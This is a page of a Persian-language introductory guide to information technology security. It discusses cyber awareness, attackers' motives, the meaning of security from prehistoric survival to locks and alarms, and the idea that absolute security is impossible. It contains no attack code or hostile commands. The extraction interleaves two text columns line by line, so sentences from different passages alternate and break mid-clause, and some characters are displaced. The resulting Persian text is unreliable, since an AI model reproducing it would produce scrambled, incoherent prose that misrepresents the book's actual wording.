‫ﻧﻤﻲﺗﻮﺍﻥ ﺍﻳﻦ ﺭﻓﺘﺎﺭ ﺭﺍ ﺗﺤﻤﻞ ﻛﺮﺩ‪ .‬ﻓﻨﻮﻥ ﻣﻮﺟﻮﺩ ﺩﺭ ﺍﻳﻦ ﻛﺘـﺎﺏ‬ ‫ﺗﻮﺍﻧﺎﻳﻲ ﻛﺴﺐ ﻭ ﺗﺄﻣﻴﻦ ﺍﻃﻼﻋﺎﺕ ﻣﻨﺎﺳﺐ ﻣـﻲﺗﻮﺍﻧـﺪ ﺩﺭ ﺗﻤـﺎﻣﻲ‬
‫ﺑﻪ ﺷﻤﺎ ﺩﺭ ﺣﻔﺎﻇـﺖ ﺍﺯ ﺧﻮﺩﺗـﺎﻥ ﺩﺭ ﻣﻘﺎﺑـﻞ ﭼﻨـﻴﻦ ﺭﻓﺘﺎﺭﻫـﺎﻳﻲ‬ ‫ﺯﻣﻴﻨﻪﻫﺎﻱ ﺍﻗﺘﺼﺎﺩﻱ ﺑﻪ ﻛﺸﻮﺭﻫﺎﻱ ﺩﺭﺣﺎﻝ ﺗﻮﺳﻌﻪ ﻛﻤﻚ ﻛﻨﺪ‪.‬‬
‫ﻛﻤﻚ ﺧﻮﺍﻫﺪ ﻧﻤﻮﺩ‪.‬‬
‫ﻣﺘﺄﺳﻔﺎﻧﻪ ﻫﻤﺔ ﻇﻮﺍﻫﺮ ﺧﻮﺏ ﻭ ﺑﺪ ﺍﻧﺴﺎﻧﻲ ﺭﺍ ﻣﻲﺗﻮﺍﻥ ﺩﺭ ﻓـﻀﺎﻱ‬
‫ﺍﻳﻦ ﻛﺘﺎﺏ ﻭ ﻫﺮ ﺁﻧﭽﻪ ﻛﻪ ﺩﺭ ﻓﻀﺎﻱ ﺳﺎﻳﺒﺮ ﻭﺟﻮﺩ ﺩﺍﺭﺩ ﺷﻤﺎ ﺭﺍ ﺍﺯ‬ ‫ﺳﺎﻳﺒﺮ ﻧﻴﺰ ﻣﺸﺎﻫﺪﻩ ﻧﻤﻮﺩ‪ .‬ﺍﺯ ﺁﻧﺠﺎ ﻛﻪ ﻧﺴﺨﻪﺑﺮﺩﺍﺭﻱ ﺍﺯ ﻣـﻀﺎﻣﻴﻦ‬
‫ﻛﺴﺐ ﺩﺍﻧﺴﺘﻪﻫﺎﻱ ﺟﺪﻳﺪﺗﺮ ﺩﺭﺑﺎﺭﺓ ﺭﺍﻳﺎﻧﻪ ﻭ ﺍﻳﻨﺘﺮﻧـﺖ ﻭ ﺍﻓـﺰﺍﻳﺶ‬ ‫ﺩﻳﺠﻴﺘـﺎﻟﻲ ﻭ ﻭﻳــﺮﺍﻳﺶ ﺁﻧﻬــﺎ ﺁﺳــﺎﻥ ﺍﺳــﺖ‪ ،‬ﻣﻐﺎﻟﻄــﻪ ﻭ ﺗﺤﺮﻳــﻒ‬
‫ﺳﻄﺢ ﺁﮔﺎﻫﻲ ﻭ ﻣﻬﺎﺭﺗﻬﺎﻳﺘﺎﻥ ﺑﻲ ﻧﻴﺎﺯ ﻧﻤﻲ ﻛﻨﺪ‪ .‬ﺍﻣـﺮﻭﺯﻩ ﺍﻳﻨﺘﺮﻧـﺖ‬ ‫ﺍﻃﻼﻋﺎﺕ ﻣﺜﻞ ﺟﻌﻞ ﻣﺴﺘﻨﺪﺍﺕ ﺍﺩﺍﺭﻱ ﻭ ﺭﺳﻤﻲ ﺁﺳﺎﻥ ﻣﻲﺷـﻮﺩ‪.‬‬
‫ﺩﺭﻭﺍﺯﺓ ﻭﺭﻭﺩ ﺑﻪ ﺩﻧﻴﺎﻱ ﺷﮕﻔﺖ ﺍﻧﮕﻴﺰ ﺍﻃﻼﻋﺎﺕ ﻭ ﺩﺍﻧﺴﺘﻪﻫﺎ ﺍﺳﺖ‬ ‫ﺑﻪ ﺩﻟﻴﻞ ﺁﻧﻜﻪ ﺍﻳﻨﺘﺮﻧﺖ ﺍﺯ ﻳﻚ ﻣﺤﻴﻂ ﭘﮋﻭﻫﺸﻲ ﻭ ﺗﻌﺎﻭﻧﻲ ﺷـﺮﻭﻉ‬
‫ﻭ ﻣﻲﺗﻮﺍﻧﺪ ﺍﻳﻦ ﺍﻃﻼﻋﺎﺕ ﺭﺍ ﺑـﺎ ﻗﻴﻤـﺖ ﺑـﺴﻴﺎﺭ ﻧـﺎﺯﻝ ﺩﺭ ﺍﺧﺘﻴـﺎﺭ‬ ‫ﺑﻪ ﻛﺎﺭ ﻛﺮﺩ ﻭ ﻫﺪﻑ ﺁﻥ ﺍﺷﺘﺮﺍﻙ ﺁﺳﺎﻥ ﺍﻃﻼﻋﺎﺕ ﺑـﻮﺩ‪ ،‬ﺳـﺎﺧﺘﺎﺭ‬
‫ﻋﻤﻮﻡ ﻗﺮﺍﺭ ﺩﻫﺪ‪ .‬ﺑﺪﻳﻦ ﺗﺮﺗﻴﺐ ﻣﻲ ﺗـﻮﺍﻥ ﺍﻃﻼﻋـﺎﺕ ﺭﺍ ﺑـﺼﻮﺭﺕ‬ ‫ﺁﻥ ﺑﺎﻋــﺚ ﺗــﺴﻬﻴﻞ ﺣﻤﻠــﻪ ﺑــﻪ ﺭﺍﻳﺎﻧــﻪﻫــﺎ ﻭ ﺳــﺮﻗﺖ ﺍﻃﻼﻋــﺎﺕ‬
‫ﻛﺎﺭﺁﻣﺪ ﻭ ﻣﺆﺛﺮﻱ ﺑﻪﺍﺷﺘﺮﺍﻙ ﮔﺬﺍﺭﺩ‪ .‬ﺑﺎ ﺍﻳﻨﺤﺎﻝ ﺑﺮﺍﻱ ﺩﺳﺘﻴﺎﺑﻲ ﺑﻪ‬ ‫ﻣﺤﺮﻣﺎﻧﻪ ﻣﻲﮔﺮﺩﺩ‪.‬‬
‫ﺍﻳﻦ ﻫﺪﻑ ﻻﺯﻡ ﺍﺳﺖ ﺍﻣﻜﺎﻧﺎﺕ ﻭ ﺭﻓﺘﺎﺭﻫﺎﻳﻲ ﻛﻪ ﻣﻤﻜﻦ ﺍﺳﺖ ﺩﺭ‬ ‫ﺍﻧﮕﻴﺰﺓ ﺍﻓﺮﺍﺩﻱ ﻛﻪ ﺩﺭ ﻓﻀﺎﻱ ﺳﺎﻳﺒﺮ ﭼﻨﻴﻦ ﺭﻓﺘﺎﺭﻱ ﺍﺯ ﺧﻮﺩ ﺑـﺮﻭﺯ‬
‫ﻣﻘﺎﺑﻞ ﺁﻥ ﻗﺮﺍﺭ ﺩﺍﺷﺘﻪ ﺑﺎﺷﻨﺪ ﺭﺍ ﺑﺸﻨﺎﺳﻴﻢ‪ .‬ﺑﺎ ﻣﻔﻬﻮﻡ ﻫﻮﺷﻴﺎﺭﻱ ﺩﺭ‬
‫ﻣﻲﺩﻫﻨﺪ ﺷﺒﻴﻪ ﺍﻧﮕﻴﺰﻩﻫﺎﻳﻲ ﺍﺳﺖ ﻛﻪ ﺩﺭ ﺩﻧﻴﺎﻱ ﻭﺍﻗﻌﻲ ﺁﻧﻬﺎ ﺭﺍ ﺑﻪ‬
‫ﺩﻧﻴﺎﻱ ﻭﺍﻗﻌﻲ ﺁﺷﻨﺎ ﻫﺴﺘﻴﻢ‪ .‬ﺍﻛﻨﻮﻥ ﺑﺎﻳـﺪ ﺑﻴـﺎﻣﻮﺯﻳﻢ ﻛـﻪ ﭼﮕﻮﻧـﻪ‬ ‫ﻛﺎﺭﻫﺎﻱ ﻣﺸﺎﺑﻪ ﻭﺍﺩﺍﺭ ﻣﻲﻛﻨﺪ‪ ،‬ﺍﻣﺎ ﺑﺎ ﻳﻚ ﺗﻔﺎﻭﺕ ﻋﻤﺪﻩ‪ :‬ﻣﺤﻴﻄﻲ‬
‫ﻣﻲﺗﻮﺍﻥ ﺩﺭ ﻓﻀﺎﻱ ﺳﺎﻳﺒﺮ ﺑﻪ ﻫﻮﺷﻴﺎﺭﻱ )ﻫﻮﺷﻴﺎﺭﻱ ﺳـﺎﻳﺒﺮ( ﺭﺳـﻴﺪ‪.‬‬ ‫ﻛﻪ ﺗﻮﺳﻂ ﺭﺍﻳﺎﻧﻪﻫﺎ ﻭ ﺍﻳﻨﺘﺮﻧﺖ ﺑﻮﺟﻮﺩ ﺁﻣﺪﻩ ﺑﺎﻋﺚ ﺷـﺪﻩ ﺩﺭ ﺍﻓـﺮﺍﺩ‬
‫ﺍﻳﻦ ﻛﺘﺎﺏ ﺑﺮﺍﻱ ﻛﻤﻚ ﺑﻪ ﺷـﻤﺎ ﺩﺭ ﺍﻧﺠـﺎﻡ ﺍﻳـﻦ ﻣﻬـﻢ ﺗﻬﻴـﻪ ﻭ‬ ‫ﺍﻳﻦ ﺗﻤﺎﻳﻞ ﺑﻮﺟﻮﺩ ﺑﻴﺎﻳﺪ ﻛﻪ ﺑﺨﻮﺍﻫﻨﺪ ﺛﺎﺑﺖ ﻛﻨﻨﺪ ﻛﻪ ﻣﻲﺗﻮﺍﻧﻨﺪ ﺑﻪ‬
‫ﺗﺪﻭﻳﻦ ﺷﺪﻩ ﺍﺳﺖ‪.‬‬
‫ﻧﺴﺨﻪ ﺍﺯ ﭘﺎﻳﮕﺎﻩ ﺭﺍ ﺩﺭ ﻳﻚ ﻣﺤﻞ ﻣﺘﻔﺎﻭﺕ ﺟﻐﺮﺍﻓﻴﺎﻳﻲ ﻣﻴﺰﺑﺎﻧﻲ ﻣﻲﻛﻨﻨـﺪ‬
‫ﺍﻣﻨﻴﺖ ﭼﻴﺴﺖ؟‬ ‫ﺗﺎ ﺯﻣﺎﻥ ﺩﺳﺘﺮﺳﻲ ﻣﺸﺘﺮﻱ ﺑﻪ ﺍﻃﻼﻋﺎﺕ‪ ،‬ﺣﺪﺍﻗﻞ ﺷﻮﺩ‪.‬‬
‫‪21‬‬ ‫‪Cairncross, F., The Death of Distance: How‬‬
‫ﻣﻔﻬﻮﻡ ﺍﻣﻨﻴﺖ ﺩﺭ ﺩﻧﻴﺎﻱ ﻭﺍﻗﻌﻲ ﺑﺮﺍﻱ ﺑﺴﻴﺎﺭﻱ ﺍﺯ ﻣﺎ ﺣﻴﺎﺗﻲ ﺍﺳﺖ‪.‬‬ ‫‪the Communications Revolution will Change‬‬
‫‪our Lives, Harvard Business School Press‬‬
‫ﺩﺭ ﺩﻭﺭﺍﻥ ﻣﺎﻗﺒﻞ ﺗﺎﺭﻳﺦ‪ ،‬ﺍﻣﻨﻴﺖ ﻋﺒﺎﺭﺕ ﺑﻮﺩ ﺍﺯ ﺍﺻﻮﻝ ﺣﻔـﻆ ﺑﻘـﺎ؛‬ ‫‪(1997).‬‬
‫‪22‬‬ ‫‪Millennium Development Goals‬‬
‫ﻧﻈﻴﺮ ﺍﻣﻨﻴﺖ ﺩﺭ ﺑﺮﺍﺑﺮ ﺣﻤﻠﺔ ﺩﻳﮕﺮﺍﻥ ﻳﺎ ﺣﻴﻮﺍﻧـﺎﺕ‪ ،‬ﻭ ﻧﻴـﺰ ﺍﻣﻨﻴـﺖ‬ ‫ﺍﻣﻨﻴﺖ ﺍﻃﻼﻋﺎﺕ ﻭ ﺍﻳﻨﺘﺮﻧﺖ ﻳﻜﻲ ﺍﺯ ﺳﻪ ﻣﻮﺿـﻮﻉ ﺍﺻـﻠﻲ ﻫـﺴﺘﻨﺪ ﻛـﻪ‬ ‫‪۲۳‬‬
‫ﺗﺄﻣﻴﻦ ﻏﺬﺍ‪.‬‬ ‫ﺍﺟﻼﺱ ﺳﺮﺍﻥ ﺟﺎﻣﻌﺔ ﺍﻃﻼﻋﺎﺗﻲ ﺩﺭ ﻛﻨﻔﺮﺍﻧﺲ ﺧـﻮﺩ ﺩﺭ ﺟﻨـﻮﺍ )ﺩﺳـﺎﻣﺒﺮ‬
‫‪ (۲۰۰۳‬ﺭﻭﻱ ﺁﻥ ﻛﺎﺭ ﻛﺮﺩ ﻭ ﻗﺮﺍﺭ ﺍﺳﺖ ﺑﺎﺯ ﻫﻢ ﺩﺭ ﺗﻮﻧﺲ )ﺁﻭﺭﻳـﻞ ‪(۲۰۰۵‬‬
‫ﺭﻭﻱ ﺁﻥ ﻛﺎﺭ ﺷﻮﺩ‪ .‬ﺍﻳﻦ ﻳﻚ ﺩﻟﻴﻞ ﺩﻳﮕﺮ ﺑﺮﺍﻱ ﺍﻳﻦ ﻭﺍﻗﻌﻴـﺖ ﺍﺳـﺖ ﻛـﻪ‬
‫ﻧﻘﺶ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﻭ ﺍﺭﺗﺒﺎﻃـﺎﺕ ﺩﺭ ﺗﻮﺳـﻌﻪ ﺑﺘـﺪﺭﻳﺞ ﺑـﻪ ﺟﺎﻳﮕـﺎﻩ‬
‫‪24‬‬ ‫‪Crackers‬‬ ‫ﻭﺍﻗﻌﻲ ﺧﻮﺩ ﻧﺰﺩﻳﻜﺘﺮ ﻣﻲﺷﻮﺩ‪.‬‬
‫ﺭﺍﻫﻨﻤﺎﻱ ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ‬ ‫‪٣٢‬‬

‫ﺗﻌﻴﻴﻦ ﺳﺮﻧﻮﺷﺖ ﺭﺍ ﺑﺎ ﺑﻴﻤﻪ ﺟﺒﺮﺍﻥ ﻣﻲﻛﻨـﻴﻢ ﺗـﺎ ﻣـﺎ ﺭﺍ ﺩﺭ ﺑﺮﺍﺑـﺮ‬ ‫ﻧﻴﺎﺯﻫﺎﻱ ﺩﻳﮕﺮ ﭼﻮﻥ ﺍﻣﻨﻴﺖ ﺩﺭ ﻣﻘﺎﺑﻞ ﺣﻮﺍﺩﺙ ﻃﺒﻴﻌﻲ ﻳﺎ ﺑﻴﻤﺎﺭﻳﻬﺎ‬
‫ﺍﺛﺮﺍﺕ ﻣﻨﻔﻲ ﻣﺎﻟﻲ‪ ،‬ﺣﻮﺍﺩﺙ ﻭ ﺑﻴﻤﺎﺭﻳﻬﺎ ﺣﻔﺎﻇﺖ ﻛﻨﺪ‪.‬‬ ‫ﻋﻤﻮﻣﹰﺎ ﺑﺮﺍﻱ ﺍﻧﺴﺎﻧﻬﺎﻱ ﻣﺎﻗﺒﻞ ﺗﺎﺭﻳﺦ ﻣﻄﺮﺡ ﻧﺒـﻮﺩ‪ .‬ﺑـﺎ ﭘﻴـﺸﺮﻓﺖ‬
‫ﺗﻤﺪﻥ‪ ،‬ﻣﺤﺪﻭﺩﺓ ﺍﻣﻨﻴﺖ ﻓﺮﺍﺗﺮ ﺭﻓﺘﻪ ﻭ ﺍﺑﻌـﺎﺩ ﻭﺳـﻴﻌﺘﺮﻱ ﻣﺎﻧﻨـﺪ ﺩﺭ‬
‫ﺍﻳﻦ ﻣﻘﺪﻣﻪ ﺣﻘﻴﻘﺘﻲ ﺭﺍ ﺩﺭﺑﺎﺭﺓ ﺍﻣﻨﻴﺖ ﭘﻴﺶ ﺭﻭﻱ ﻣﺎ ﻗﺮﺍﺭ ﻣﻲﺩﻫﺪ‪:‬‬
‫ﺍﺧﺘﻴﺎﺭ ﺩﺍﺷﺘﻦ ﻣﻜﺎﻧﻲ ﺑﺮﺍﻱ ﺁﺳﺎﻳﺶ ﻭ ﺯﻧﺪﮔﻲ ﺑﻲﺧﻄـﺮ ﺭﺍ ﺩﺭ ﺑـﺮ‬
‫ﺍﻣﻨﻴﺖ ﻣﻄﻠﻖ ﭼﻪ ﺩﺭ ﺯﻧـﺪﮔﻲ ﻭﺍﻗﻌـﻲ ﻭ ﭼـﻪ ﺩﺭ ﻓـﻀﺎﻱ ﺳـﺎﻳﺒﺮ‬
‫ﮔﺮﻓﺖ ﻭ ﺍﻣﺮﻭﺯﻩ ﻣﻔﻬﻮﻡ ﺍﻣﻮﺍﻝ ﺷﺨﺼﻲ ﻧﻴﺰ ﺑـﻪ ﺗﻌﺮﻳـﻒ ﺍﻣﻨﻴـﺖ‬
‫ﻏﻴﺮﻣﻤﻜﻦ ﻭ ﻣﺤﺎﻝ ﺍﺳﺖ؛ ﻭﻟﻲ ﺑﺎ ﺍﻳﻨﺤﺎﻝ ﺍﻣﻨﻴﺘﻲ ﻛﻪ ﺑـﻪ ﺍﻧـﺪﺍﺯﺓ‬
‫ﺍﺿﺎﻓﻪ ﺷﺪﻩ ﺍﺳﺖ‪.‬‬
‫ﻛــﺎﻓﻲ ﻣﻨﺎﺳــﺐ ﺑﺎﺷــﺪ ﺗﻘﺮﻳﺒــﹰﺎ ﺩﺭ ﺗﻤــﺎﻣﻲ ﺷــﺮﺍﻳﻂ ﻣﺤﻴﻄــﻲ‬
‫ﺩﺳﺖﻳﺎﻓﺘﻨﻲ ﻣﻲﺑﺎﺷﺪ‪.‬‬ ‫ﺑﻴﺸﺘﺮ ﺁﻧﭽﻪ ﻛﻪ ﻣﺎ ﺩﺭ ﺩﻧﻴﺎﻱ ﻭﺍﻗﻌﻲ ﺍﻧﺠﺎﻡ ﻣﻲﺩﻫﻴﻢ ﺑﺎ ﻣﺨـﺎﻃﺮﻩ‬
‫ﻫﻤﺮﺍﻩ ﺍﺳﺖ؛ ﻫﺮﭼﻨﺪ ﺑﺴﻴﺎﺭﻱ ﺍﺯ ﻓﻌﺎﻟﻴﺘﻬﺎﻳﻤﺎﻥ ﻣﺨﺎﻃﺮﺓ ﻛﻤﻲ ﺩﺭ‬
‫ﻲ‬
‫ﺭﺍﻫﻬﺎﻱ ﮔﻮﻧﺎﮔﻮﻧﻲ ﺑﺮﺍﻱ ﺩﺭ ﺍﺧﺘﻴﺎﺭ ﮔﺮﻓﺘﻦ ﻣﻜﺎﻧﻴﺰﻣﻬﺎﻱ ﺗﻘـﻮﻳﺘ ﹺ‬
‫ﻼ ﻭﻗﺘﻲ ﺑﻪ ﻫﻤﺮﺍﻩ ﺷﺨﺼﻲ ﻧﺎﺁﺷﻨﺎ ﺑﻪ ﺳﻔﺮ ﻣﻲﺭﻭﻳـﻢ‬ ‫ﭘﻲ ﺩﺍﺭﺩ‪ .‬ﻣﺜ ﹰ‬
‫ﺍﻓﺰﺍﻳﺶ ﻭ ﺣﻔﻆ ﺍﻣﻨﻴﺖ ﻭﺟﻮﺩ ﺩﺍﺭﺩ‪ .‬ﻣﺎ ﺍﺯ ﻣﻜﺎﻧﻴﺰﻣﻬـﺎﻱ ﻓﻴﺰﻳﻜـﻲ‬
‫ﻭ ﻳﺎ ﺑﻪ ﺷﻬﺮ ﻳﺎ ﻛﺸﻮﺭﻱ ﻧﺎﺁﺷﻨﺎ ﻭﺍﺭﺩ ﻣﻲﺷـﻮﻳﻢ ﺍﻳـﻦ ﺣﻘﻴﻘـﺖ ﺭﺍ‬
‫ﺑﺮﺍﻱ ﺗﻀﻤﻴﻦ ﺍﻣﻨﻴﺖ ﺧﻮﺩ ﺑﺮﺧﻮﺭﺩﺍﺭ ﻫﺴﺘﻴﻢ‪ :‬ﺳﺎﺧﺘﻤﺎﻧﻬﺎﻱ ﺑﻠﻨﺪ ﻭ‬
‫ﻣﺴﺘﺤﻜﻢ ﻭ ﺩﺭﻫﺎﻱ ﻣﺤﻜـﻢ ﻭ ﻧﻔﻮﺫﻧﺎﭘـﺬﻳﺮ ﺑـﻪ ﻫﻤـﺮﺍﻩ ﻗﻔﻠﻬـﺎ ﻭ‬ ‫ﻣﻲﺩﺍﻧﻴﻢ ﻛﻪ ﺑﺮﺍﻱ ﺍﻣﻨﻴﺖ ﺟـﺴﻤﻲﻣـﺎﻥ ﺗﻬﺪﻳـﺪﺍﺗﻲ ﻭﺟـﻮﺩ ﺩﺍﺭﺩ‪.‬‬
‫ﻛﻠﻴﺪﻫﺎﻱ ﺑﻲﺷﻤﺎﺭ‪ .‬ﻣﺎ ﻣﻲﺗﻮﺍﻧﻴﻢ ﺑﻪ ﻣﺮﺯﻫﺎﻱ ﻓﻴﺰﻳﻜﻲ ﺩﻳﮕﺮ ﻣﺜﻞ‬ ‫ﺗﻬﺪﻳﺪﺍﺕ ﻣﻮﺟﻮﺩ ﺩﺭ ﺍﻃﺮﺍﻑ ﻣﺎ ﻭﻗﺘﻲ ﺟﺪﻱ ﺧﻮﺍﻫﻨﺪ ﺷﺪ ﻛـﻪ ﻣـﺎ‬
‫ﺩﻳﻮﺍﺭﻫﺎ ﻭ ﺩﻳﮕـﺮ ﻣﻮﺍﻧـﻊ ﺟﺪﺍﺳـﺎﺯ ﻧﻴـﺰ ﺗﻜﻴـﻪ ﻛﻨـﻴﻢ‪ .‬ﻫﻤﭽﻨـﻴﻦ‬ ‫ﺩﺭ ﻣﻜﺎﻧﻲ ﺣﻔﺎﻇﺖﻧﺸﺪﻩ ﻗﺮﺍﺭ ﺑﮕﻴﺮﻳﻢ ﻭ ﺑﺎ ﻓـﺮﺩﻱ ﺭﻭﺑـﺮﻭ ﺷـﻮﻳﻢ‬
‫ﻣﻲﺗﻮﺍﻧﻴﻢ ﺭﻭﻱ ﻣﻨﺎﻃﻘﻲ ﻛﻪ ﺍﺯ ﻃﺮﻳﻖ ﺁﻧﻬﺎ ﺍﺣﺘﻤﺎﻝ ﻧﻔﻮﺫ ﻣـﻲﺭﻭﺩ‬ ‫ﻛﻪ ﺑﺘﻮﺍﻧﺪ ﺍﺯ ﻣﻮﻗﻌﻴﺖ ﻣﺎ ﺳﻮﺀ ﺍﺳﺘﻔﺎﺩﻩ ﻛﻨﺪ‪ .‬ﺍﮔﺮ ﺑﻪ ﺍﻧـﺪﺍﺯﺓ ﻛـﺎﻓﻲ‬
‫ﺑﻪ ﻣﺨﺎﻃﺮﺍﺕ ﺍﻃﺮﺍﻑ ﺧـﻮﺩ ﺗﻮﺟـﻪ ﻛﻨـﻴﻢ ﻣﻮﻓـﻖ ﺧـﻮﺍﻫﻴﻢ ﺷـﺪ‬
‫ﻧﻮﺭ ﻛﺎﻓﻲ ﻣﺘﻤﺮﻛﺰ ﻛﻨﻴﻢ‪ .‬ﻧﻬﺎﻳﺘﹰﺎ ﺍﻳﻨﻜﻪ ﺩﺭﺻﻮﺭﺕ ﻟﺰﻭﻡ ﻣﻲﺗﻮﺍﻥ ﺑﺎ‬
‫ﻼ ﻫﻤﺮﺍﻩ ﻛـﺴﻲ‬ ‫ﻣﻜﺎﻧﻲ ﺍﻣﻦ ﭘﻴﺪﺍ ﻛﻨﻴﻢ ﻳﺎ ﺭﺍﻩ ﭼﺎﺭﻩﺍﻱ ﺑﻴﺎﺑﻴﻢ؛ ﻣﺜ ﹰ‬
‫ﺍﻳــﻦ ﻓــﺮﺽ ﻛــﻪ ﺍﻗــﺪﺍﻣﺎﺕ ﻧﻔــﻮﺫﻱ ﺍﻭﻟﻴــﻪ ﻣﻮﻓــﻖ ﺑﺎﺷــﻨﺪ ﺍﺯ‬
‫ﺷﻮﻳﻢ ﻛﻪ ﻣﺎ ﺭﺍ ﺑﻪ ﻣﻜﺎﻥ ﺍﻣﻨﻲ ﻫﺪﺍﻳﺖ ﻛﻨـﺪ‪ ،‬ﻳـﺎ ﻳـﻚ ﺗﺎﻛـﺴﻲ‬
‫ﺳﻴﺴﺘﻤﻬﺎﻱ ﻫﺸﺪﺍﺭﺩﻫﻨﺪﻩ ﻭ ﻣﺤﺎﻓﻈﻬﺎﻱ ﻗﻮﻳﺘﺮ ﺑﺮﺍﻱ ﺷﻨﺎﺳﺎﻳﻲ ﻭ‬
‫ﻣﻘﺎﺑﻠﻪ ﺑﺎ ﻛﺴﺎﻧﻴﻜﻪ ﻣﻮﻓﻖ ﺑﻪ ﻧﻔﻮﺫ ﺷﺪﻩﺍﻧﺪ ﺍﺳﺘﻔﺎﺩﻩ ﻧﻤﻮﺩ‪ .‬ﻣﻬﻤﺘـﺮ‬ ‫ﺑﮕﻴﺮﻳﻢ‪.‬‬
‫ﺍﺯ ﻫﻤﻪ ﺍﻳﻨﻜﻪ ﻣﻲﺗﻮﺍﻧﻴﻢ ﺍﺯ ﭘﺸﺘﻴﺒﺎﻧﻲ ﻗﻮﺍﻧﻴﻦ ﻋﻤﻮﻣﻲ ﻭ ﺟﺰﺍﻳﻲ ﻭ‬ ‫ﺑﻌﻀﻲ ﺍﺯ ﻛﺎﺭﻫﺎ ﻣﺨﺎﻃﺮﺍﺕ ﺭﻭﺍﻧﺸﻨﺎﺧﺘﻲ ﻳﺎ ﻣﺎﻟﻲ ﺑﻪ ﻫﻤﺮﺍﻩ ﺩﺍﺭﻧـﺪ‬
‫ﻧﻴﺮﻭﻫﺎﻱ ﺍﻧﺘﻈﺎﻣﻲ ﻧﻴﺰ ﺩﺭﺧﻮﺍﺳﺖ ﻛﻤﻚ ﻧﻤﺎﻳﻴﻢ‪.‬‬ ‫ﻭﻟﻲ ﻣﺨﺎﻃﺮﺓ ﺟﺴﻤﻲ ﻧﺪﺍﺭﻧﺪ‪ .‬ﻭﻗﺘﻲ ﺳﺮﻣﺎﻳﻪﮔﺬﺍﺭﻱ ﻣﻲﻛﻨـﻴﻢ )ﺩﺭ‬
‫ﻫﺮﻳﻚ ﺍﺯ ﺍﺷﻜﺎﻝ ﺧﺮﻳﺪ ﺯﻣﻴﻦ‪ ،‬ﺳﻬﺎﻡ ﻳﺎ ﺣﺘﻲ ﻓﻌﺎﻟﻴﺖ ﺩﺭ ﺗﺠﺎﺭﺕ ﻭ ﻳﺎ ﻛـﺎﺭ ﺩﺭ‬
‫ﻻ ﺍﺯ ﭼﻨﺪﻳﻦ ﺭﻭﺵ ﻣﺨﺘﻠﻒ ﺑﺮﺍﻱ ﺍﻓﺰﺍﻳﺶ ﺍﻣﻨﻴـﺖ ﺧـﻮﺩ‬ ‫ﻣﺎ ﻣﻌﻤﻮ ﹰ‬
‫ﺑﺎﺯﺍﺭ( ﺍﻧﺘﻈﺎﺭ ﺩﺍﺭﻳﻢ ﻛﻪ ﺍﻳﻦ ﺳﺮﻣﺎﻳﻪ ﻫﺮﭼﻪ ﺯﻭﺩﺗﺮ ﺑﻪ ﻣـﺎ ﺑـﺎﺯﮔﺮﺩﺩ‪.‬‬
‫ﺍﺳﺘﻔﺎﺩﻩ ﻣﻲﻛﻨﻴﻢ ﺗﺎ ﺩﺭﺻﻮﺭﺗﻴﻜﻪ ﻳﻜﻲ ﺍﺯ ﺗﺪﺍﺑﻴﺮ ﻣﻔﻴﺪ ﻭﺍﻗﻊ ﻧـﺸﺪ‬
‫ﻫﻤﺎﻧﻄﻮﺭ ﻛﻪ ﻣﻲﺩﺍﻧﻴﻢ ﺑﻌـﻀﻲ ﺍﺯ ﺳـﺮﻣﺎﻳﻪﮔـﺬﺍﺭﻳﻬﺎ ﺩﻳـﺮ ﻳـﺎ ﺯﻭﺩ‬
‫ﺩﻳﮕﺮﻱ ﺧﻼﺀ ﺁﻧﺮﺍ ﭘﺮ ﻛﻨﺪ‪ .‬ﺍﮔﺮ ﻳﻜﻲ ﺍﺯ ﻛﻠﻴﺪﻫﺎ ﺑﻪ ﺳﺮﻗﺖ ﺭﻓﺖ ﻭ‬
‫ﺑﺎﺯﺧﻮﺍﻫﻨﺪ ﮔﺸﺖ؛ ﺣﺎﻝ ﺁﻧﻜﻪ ﺑﻌﻀﻲ ﺍﺯ ﺳﺮﻣﺎﻳﻪﮔـﺬﺍﺭﻳﻬﺎ ﺍﻳﻨﮕﻮﻧـﻪ‬
‫ﻞ ﺩﺭ ﺍﺯ ﺁﻥ ﭘﺲ ﺣﻔﺎﻅ ﻣﻄﻤﺌﻨﻲ ﺑﻪ ﺷﻤﺎﺭ ﻧﻤﻲﺭﻓﺖ‪ ،‬ﻣﻲﺗﻮﺍﻥ‬ ‫ﻗﻔ ﹺ‬
‫ﻼ ﻭﻗﺘﻲ‬‫ﻧﻴﺴﺘﻨﺪ ﻭ ﺑﻌﻀﻲ ﺍﺯ ﺁﻧﻬﺎ ﻫﻢ ﺑﻪ ﺯﻳﺎﻥ ﻣﻨﺠﺮ ﻣﻲﺷﻮﻧﺪ‪ .‬ﻣﺜ ﹰ‬
‫ﺍﺯ ﻋﻼﺋﻢ ﻫﺸﺪﺍﺭﺩﻫﻨﺪﻩ ﺑﺮﺍﻱ ﺍﻋﻼﻡ ﺧﻄـﺮ ﻧﻔـﻮﺫ ﺍﺳـﺘﻔﺎﺩﻩ ﻛـﺮﺩ‪.‬‬
‫ﺑﺎ ﺷﺨﺺ ﺟﺪﻳﺪﻱ ﺍﺭﺗﺒﺎﻁ ﺑﺮﻗﺮﺍﺭ ﻣﻲﻛﻨﻴﻢ ﺍﻣﻴـﺪﻭﺍﺭﻳﻢ ﻛـﻪ ﺍﻳـﻦ‬
‫ﺍﻟﺒﺘﻪ ﺗﻌﺪﺍﺩ ﻣﺮﺯﻫﺎ ﻭ ﻋﻮﺍﻣﻞ ﺳﺪﻛﻨﻨﺪﻩ ﺑﻪ ﺍﺭﺯﺵ ﭼﻴﺰﻱ ﻛﻪ ﻣـﻮﺭﺩ‬
‫ﺭﺍﺑﻄﺔ ﺟﺪﻳﺪ ﺑﺮﺍﻳﻤﺎﻥ ﺁﻭﺭﺩﻩﺍﻱ ﺩﺍﺷﺘﻪ ﺑﺎﺷﺪ‪ ،‬ﻫﺮﭼﻨـﺪ ﺧﻄـﺮ ﺍﻳـﻦ‬
‫ﺣﻔﺎﻇﺖ ﻗﺮﺍﺭ ﻣﻲﮔﻴﺮﺩ ﻭ ﺍﻧﺘﻈـﺎﺭﺍﺕ ﻣﻌﻘﻮﻻﻧـﻪﺍﻱ ﻛـﻪ ﺩﺭ ﺯﻣﻴﻨـﺔ‬
‫ﻣﺴﺌﻠﻪ ﻛﻪ ﻣﻤﻜﻦ ﺍﺳـﺖ ﺍﻳـﻦ ﺭﺍﺑﻄـﻪ ﺍﺯ ﻓﺎﻳـﺪﺓ ﻻﺯﻡ ﺑﺮﺧـﻮﺭﺩﺍﺭ‬
